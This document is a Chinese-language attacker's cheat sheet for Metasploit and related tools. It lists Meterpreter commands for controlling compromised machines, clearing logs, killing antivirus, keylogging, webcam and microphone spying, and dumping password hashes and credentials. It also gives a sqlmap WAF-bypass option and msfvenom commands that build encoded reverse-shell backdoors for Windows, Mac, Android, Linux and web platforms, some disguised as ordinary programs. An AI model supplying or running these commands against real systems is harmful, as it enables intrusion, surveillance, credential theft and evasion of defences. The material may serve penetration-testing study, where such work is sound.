MSF会话操作
基本功能
- ?
- help
- bg/background/^z
相关功能
ps 查看进程
getuid # 获取运行木马的用户
getpid # 获取进程号
migrate 7240 # 进程迁移
run vnc # 查看靶机的桌面
execute -f 路径 # 后台运行
kill 结束进程 kill 432
文件管理功能
lpwd # 获取攻击机当前工作目录
lls # 列攻击机当前目录内容
pwd # 获取肉鸡当前工作目录
ls # 列肉鸡当前目录内容
cd # windows下应该用双反斜杠间隔文件名,在遇到空格时应该使用引号
# c:\documents and Settings\administrator\桌面
# C:\Users\Anyone\Desktop
lcd # 切换攻击机本地目录
upload 上传文件
upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\offsec
download 下载文件
download c:\\windows\\system32\\calc.exe /tmp/calc.exe
mkdir 创建文件夹
edit 编辑文件
mv 移动文件(前提是文件(夹)不存在)
cat 查看文件内容
rm 删除文件
rmdir 文件夹
show_mount # 查看挂载点
search -f ein.ini # 搜索文件
网络功能
arp 查看arp缓存表(IP地址和MAC地址的对照关系)
ifconfig/ipconfig 查看ip地址网卡
netstat 查看端口连接
getproxy # 获取代理
系统功能
ps 查看进程
reg 修改注册表
reboot 重启电脑
shell 获取shell
shutdown 关闭电脑
sysinfo 获取电脑信息
getsystem 获取高权限
其他功能
clearev # 清除日志
bgrun killav # 杀死杀病毒软件
bgrun vnc # 监控
enumdesktops 窗体列表(用户登录数)
keyscan_start 键盘记录-开始
keyscan_dump 键盘记录-下载
keyscan_stop 键盘记录-停止
uictl 获取键盘鼠标的控制权
uictl disable keyboard 锁定键盘
screenshot
record_mic 录制音频
webcam_chat 查看目标的摄像头
webcam_list 摄像头列表
webcam_stream 摄像头监控
hashdump 下载hash密文
route
getsystem: 提权、获取hash
load kiwi
creds_all
CS和MSF插件安装和使用
MSF插件的使用
load xxx
xxx
unload xxx
CS插件的使用
LSTAR为例
开启RDP服务方便远程连接
- 获得一个beacon连接
- 用插件开启RDP服务
- 获得hash,到cmd5上查看对应密码
- 物理机上输入mstsc,连接肉鸡
编写SQLMap绕WAF插件
改一个绕WAF的tamper脚本并另存,记住脚本文件名
把脚本放入到sqlmap的tamper目录下
运行sqlmap时添加tamper选项绕waf,例如
sqlmap -u "http://xxxx/?id=1" --tamper wide_byte --dbs
MSF多平台木马制作
新版本Kali用 msfvenom 取代了msfpayload和msfencode,常用于生成后门木马。
回忆之前的木马
设立一个监听器
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost xxx.xxx.xx.xxx
msf6 > set lport 4444
msf6 > run -j
生成第一个木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=4444 -f
exe -o wps.exe
参数利用练习
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=4444 -x
/usr/share/windows-binaries/vncviewer.exe -e x86/shikata_ga_nai -i 5 -b
'\x00\x0a\xff' -f exe -o vncc.exe
各平台生成payload命令
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=4444 -e
x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o radmine-shikatanoadd.exe
Mac
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp
LHOST=192.168.61.111 LPORT=4444 -f macho -o payload.macho
Android
msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -o
payload.apk
Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp
LHOST=xxx.xxx.x.x LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o
payload.ps1
Linux
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp
LHOST=xxx.xxx.xx.xxx LPORT=4567 -f elf -o payload.elf
php
msfvenom -p php/meterpreter_reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=8888 -f raw
> shell.php
aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=xxx.xxx.xx.x. LPORT=8888 -f aspx -o payload.aspx
JSP
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.x.x
LPORT=4567 -f raw -o payload.jsp
war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f raw - o
payload.war
nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f raw -o
payload.js
python
msfvenom -p python/meterpreter/reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f
raw -o payload.py
perl
msfvenom -p cmd/unix/reverse_perl LHOST=xxx.xxx.x.x LPORT=4567 -f raw -o
payload.pl
ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f raw -o
payload.rb